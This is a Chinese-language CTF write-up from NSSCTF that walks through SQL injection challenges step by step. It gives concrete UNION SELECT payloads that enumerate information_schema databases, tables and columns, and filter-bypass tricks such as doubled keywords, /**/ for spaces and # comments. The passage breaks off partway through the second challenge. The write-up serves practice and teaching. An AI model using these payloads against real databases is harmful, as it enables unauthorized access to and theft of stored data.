NSSCTF———Web（sql注入）-数字星空

[LitCTF 2023]这是什么？SQL ！注一下！

[SWPUCTF 2022 新生赛]ez_sql

[GXYCTF 2019]BabySqli

点击右下角文章可跳转

[LitCTF 2023]这是什么？SQL ！注一下！

首先我们打开靶场查看信息，提示了闭合方式为id = (((((())))))

然后我们进行判断回显位，用order by或group by都可以，会发现2有回显，3没有回显，所以回显位为2。如果细心可以发现题目也有提示username，password也可以猜测回显位为2，如果保险起见也可以测试一下

接下来就是进行查询数据库的操作，一般来说我们用http://node5.anna.nssctf.cn:28411/?id=1)))))) union select 1,database() --+这种语句来查询，但这道题数据库有很多，而且直接查出来的数据库得到的flag是假的，所以我就不演示了，你们可以自己查查看，我们直接查询全部数据库名

我用的是union select 1,schema_name from information_schema.schemata--+来查询

可以看到有几个很可能存在flag的数据库 ctftraining和ctf，这里我就直接跟大家说第一个存在真的flag。然后进行常规的sql注入

第一步，查表名 union select 1,group_concat(table_name)from information_schema.tables where table_schema='ctftraining'--+

可以看到有一个叫flag的表名，

第二步，查列名：union select 1,group_concat(column_name)from information_schema.columns where table_name='flag'--+

最后再查询一下这个叫flag的数据就可以得到flag

union select 1,group_concat(flag)from ctftraining.flag--+

[SWPUCTF 2022 新生赛]ez_sql

上来给了一波提示，相对安全的传参意思就是POST传参，还直接提示了参数是nss，我们先尝试随便输个数字，直接给了flag，但是这flag一看就是假的

然后用nss1 and1=1 这种手段判断类型，这题是字符型我就不演示了，然后我们要去判断回显数，会发现or和空格都被过滤了

然后我们用双写or绕过，用/**/代替空格，对了这里--+也被过滤了，我们可以用#号带替--+

我们再试一次 nss=1'/**/oorrder/**/by/**/3#

如果是4的话会报错，所以回显数为3

然后我们用联合查询去查数据库名，这道题的union也被过滤了，同样我们双写绕过 nss=1'/**/uniunionon/**/select/**/1,2,database()/**/limit/**/1,1#

后面用了limit 1,1，因为第一个回显位没有我们要的信息，我们需要跳转到第二个回显位，所以得到数据库名，NSS_db

下一步就是查表名 nss=1'/**/uniunionon/**/select/**/1,2,group_concat(table_name)from/**/infoorrmation_schema.tables/**/where/**/table_schema='NSS_db'/**/limit/**/1,1#

记得information里面的or也需要双写